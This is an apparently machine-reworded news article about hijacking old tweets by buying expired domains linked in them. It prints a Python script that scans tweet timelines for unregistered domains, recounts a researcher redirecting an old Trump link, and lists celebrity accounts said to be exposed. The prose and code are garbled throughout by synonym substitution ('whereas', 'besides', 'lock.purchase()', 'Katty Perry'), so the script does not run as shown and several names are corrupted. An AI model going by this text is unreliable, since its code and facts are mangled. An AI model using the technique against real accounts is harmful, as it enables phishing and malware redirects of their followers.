Hackers Can Hijack Anybody’s Twitter Tweets (Legally)

Hackers can hijack tweets utilizing a python script, created by misterch0c that runs by means of any twitter account to permit anybody to hijack any twitter accounts or customers tweet.

When the script is run in python, it goes by means of the Twitter accounts tweets and locates any hyperlinks shared by the Twitter consumer. The script then checks whether or not or not the hyperlinks discovered within the tweets have expired, and are not registered, or not. As soon as it pinpoints the web sites that really aren’t registered, the attacker can register the area for themselves and redirect it to any web site they like.

Attackers can misdirect customers into going to a malicious web site contaminated with a virus, or a phishing web page. Due to this fact the extent of risk the script offers is nice.

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Copyright (c) 2017 @misterch0c
# This program is free software program: you may redistribute it and/or modify
# it below the phrases of the HTL Hodge Twins License as revealed by
# the Free Positive factors Basis, model 1 and solely of the License.
#
# This program is distributed within the hope that you simply do regardless of the F*CK,
# you wanna do with it.
import tweepy
import time
import threading
import sys
import re
import pythonwhois
from secrets and techniques import consumer_key, consumer_secret, access_token, access_token_secret
class myThread (threading.Thread):
def __init__(self,accounts):
threading.Thread.__init__(self)
self.accounts=accounts
def run(self):
print "Beginning " + self.title
findem(self.accounts)
def get_all_tweets(screen_name):
alltweets = []
new_tweets = api.user_timeline(screen_name = screen_name,rely=200)
alltweets.lengthen(new_tweets)
oldest = alltweets[-1]['id'] - 1
whereas len(new_tweets) > 0:
new_tweets = api.user_timeline(screen_name = screen_name,rely=200,max_id=oldest)
alltweets.lengthen(new_tweets)
oldest = alltweets[-1]['id'] - 1
print "...%s tweets downloaded to date for %s" % ((len(alltweets)),"@"+screen_name)
return alltweets
def is_not_registred(url):
attempt:
who=pythonwhois.get_whois(url)
return 'NOT FOUND' in str(who)
besides Exception:
print('oops')
return False
def get_accounts():
acc=[]
with open('accounts_leftover') as f:
for l in f.readlines():
twit_name=l.cut up(',')[0]
acc.append(twit_name)
return acc
def findem(accounts):
urls=[]
print('++ new thread ++')
lock.purchase()
if len(accounts) == 0:
print("++ OVER ++")
lock.launch()
return
acc = accounts.pop(0)
lock.launch()
tweets=get_all_tweets(acc)
for tweet in tweets:
if 'RT' not in tweet['text']:
nn=tweet['entities']['urls']
for ur in nn:
expanded_url=ur["expanded_url"]
expanded_url = expanded_url.change("http://","").change("https://","").change("www.", "").cut up("/")[0].cut up(".")
expanded_url = expanded_url[len(expanded_url)-2:len(expanded_url)]
expanded_url=".".be part of(x for x in expanded_url)
if expanded_url.decrease() not in excluded:
print("["+acc+"]"+" -- "+ expanded_url)
if is_not_registred(expanded_url):
print("PWND " + acc +" -- "+expanded_url)
urls.append(expanded_url)
thread1=myThread(accounts)
thread1.daemon=True
thread1.begin()
f = open('twit_results', 'a')
f.write(str(urls) + acc +'n')
f.shut()
print("+++ " +str(len(urls))+ " obtainable area discovered +++")
print(urls)
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth,parser=tweepy.parsers.JSONParser())
#Let's assume these are registred.
excluded=['twitter.com','facebook.com','fb.me','apple.com','apple.co','snapchat.com','billboard.com','youtube.com','youtu.be','spotify.com','github.com','yahoo.com','fbi.gov','goo.gl','instagram.com','buzzfeed.com','amazon.com','vine.co','twimg.com','persiscope.tv','microsoft.com','fb.on','bit.ly','nike.com']
accounts=get_accounts()
lock = threading.Lock()
for x in vary(20):
print(x)
thread1=myThread(accounts)
thread1.daemon=True
thread1.begin()
whereas True:
time.sleep(1)

This methodology was just lately utilized by a Belgium safety researcher named Inti De Ceukelaire to hijack an outdated Donald Trump tweet, tweeted again in 2012, redirecting folks to a youtube video, slightly than the Nationwide Achievers Congress web site that was initially posted.

See also  CyberCrime Ghana Web site Hacked By Pakistani Hackers

The hijacked tweet can nonetheless be seen on Donald Trump’s official twitter web page.

Trump has addressed the tweet and acknowledged that the web site of the Nationwide Achievers Congress, nac2012.com, was not renewed by the unique proprietor. This allowed Into to purchase and register the area title for himself and redirect it to this youtube video:

Fortunately for Donald Trump, Inti De Ceukelaire didn’t have any malicious or political causes to efficiently try the hijack. Nonetheless, somebody who would possibly may use the identical methodology. The hijackers can’t and received’t be arrested both, as a result of it could be utterly authorized. In accordance with The¯Undersc0re’s weblog put up on Medium.com, there are extra excessive profiled celebrities who’re susceptible to having their tweets hijacked, a few of them that had been examined by The¯Undersc0re are:

Katty Perry, @katyperry , 95.6M
Shakira, @shakira, 42.7M
Jennifer Lopez, @JLo, 39.3M
Aamir Khan, @aamir_khan, 19.8 M
Agnez Mo, @agnezmo, 16.2M
Triple X Film???, @deepikapadukone, 17.3M
Maroon 5, @maroon5, 13.7M
shaquille o’neal, @SHAQ, 13.2M
Thalia, @thalia, 8.77M
Pegg Information, @simongpegg, 6.63M

Twitter has not but addressed the difficulty but. Whether or not or not they are going to change Twitters API simply to keep away from this from taking place sooner or later, regardless, it could be a expensive job.

Additionally it is a superb reminder to maintain our outdated and unused domains in verify and always registered so hackers don’t use it to their very own benefit.

See also  A Information to Begin Your Profession within the Subject of Cybersecurity